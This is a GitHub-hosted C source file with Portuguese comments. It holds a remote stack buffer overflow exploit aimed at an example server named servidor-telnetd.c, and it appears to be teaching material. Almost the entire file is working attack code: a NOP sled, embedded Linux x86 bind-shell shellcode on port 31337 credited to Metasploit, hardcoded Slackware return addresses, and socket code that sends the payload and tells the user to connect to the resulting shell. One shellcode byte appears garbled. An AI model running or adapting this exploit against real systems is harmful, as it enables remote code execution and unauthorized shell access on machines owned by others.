-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.c
159 lines (130 loc) · 4.67 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
/* Exploit exemplo para servidor-telnetd.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h> /* inet_ntoa() to format IP address */
#include <netinet/in.h> /* in_addr structure */
#define PORTA 8123
#define OFFSET 0
#define ALINHA 0
#define ERRO -1
#define MAX 272
#define RET 0xbfffeef0 /* Slackware 10.1 - virtualinsanity */
#define RET2 0xbffff3f0 /* Slackware 10 - weiddy */
#define RET3 0xbfffee40 /* $esp = info registers esp */
#define RET4 0x41414141 /* endereco "crash-only" */
/* Linux x86 bind shell port 31337 - from Metasploit Framework (84 bytes) */
unsigned char x86_lnx_bind[] = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99"
"\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x7a\x69"
"\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89"
"\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52"
"\x56\x43\x89\xe1\xb0\x6 \xcd\x80\x93\x6a\x02"
"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\xcd\x80";
int cria_conexao(char *host, unsigned int porta);
void uso(char *nomeprograma);
int main(int argc, char *argv[])
{
char payload[MAX], *host;
int sockfd;
unsigned int i, opcao, porta;
int ret, offset, alinhamento;
memset(payload, 0x00, sizeof(payload)); /* zeramos o nosso buffer */
host = NULL;
ret = RET;
offset = OFFSET; /* offset padrao */
porta = PORTA;
alinhamento = ALINHA;
fprintf(stdout, "Exploit para o exemplo servidor-telnetd.c\n");
if(argc < 2)
uso(argv[0]);
while((opcao = getopt(argc, argv, "h:o:p:a:")) != EOF)
{
switch(opcao)
{
case 'h':
if(strlen(optarg) > 255)
{
fprintf(stderr, "Tamanho de host invalido.\n");
exit(ERRO);
}
host = optarg;
break;
case 'o':
offset = atoi(optarg);
break;
case 'p':
if(atoi(optarg) > 65535 || atoi(optarg) < 0)
{
fprintf(stderr, "Porta invalida.\n");
exit(ERRO);
}
porta = atoi(optarg);
break;
case 'a':
alinhamento = atoi(optarg);
break;
default:
uso(argv[0]);
}
}
sockfd = cria_conexao(host, porta);
if(offset != 0)
ret = RET2 + offset;
/* enchemos com NOPs parte do nosso payload, deixando espaco para o
shellcode e o endereco de retorno */
memset(payload + alinhamento, 0x90, MAX - strlen(x86_lnx_bind) - 4);
/* copiando o shellcode */
memcpy(payload + alinhamento + (MAX - strlen(x86_lnx_bind) - 4), x86_lnx_bind, sizeof(x86_lnx_bind));
for(i=strlen(payload); i < MAX; i+=4)
*((int *) &payload[i]) = ret;
fprintf(stdout, "Usando 0x%x como endereco de retorno.\n", ret);
write(sockfd, payload, strlen(payload));
fprintf(stdout, "Payload enviado! Conecte em %s:31337\n", host);
shutdown(sockfd, SHUT_RDWR);
close(sockfd);
}
int cria_conexao(char *host, unsigned int porta)
{
struct sockaddr_in conexao;
struct hostent *hbn;
int sockfd;
/* fecha o programa se o socket nao for criado com sucesso */
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERRO)
{
fprintf(stderr, "Erro #%d criando socket principal: %s\n", errno, strerror(errno));
exit(ERRO);
}
/* tenta fazer um resolv no host para ver se ele existe */
if((hbn = gethostbyname(host)) == NULL)
{
fprintf(stderr, "Erro #%d gethostbyname(): Impossivel achar %s.\n", errno, host);
exit(ERRO);
}
/* preenchendo as estruturas de rede */
bzero((char *)&conexao,sizeof(conexao));
conexao.sin_family = AF_INET;
conexao.sin_port = htons(porta);
conexao.sin_addr = *((struct in_addr *)hbn->h_addr);
if(connect(sockfd,(struct sockaddr *)&conexao, sizeof(conexao)) == ERRO)
{
fprintf(stderr,"Erro #%d: %s.\n", errno, strerror(errno));
shutdown(sockfd, SHUT_RDWR);
close(sockfd);
exit(ERRO);
}
return(sockfd);
}
void uso(char *nomeprograma)
{
fprintf(stdout, "Uso: %s -h <host> -p [porta] -o [offset]\n", nomeprograma);
exit(0);
}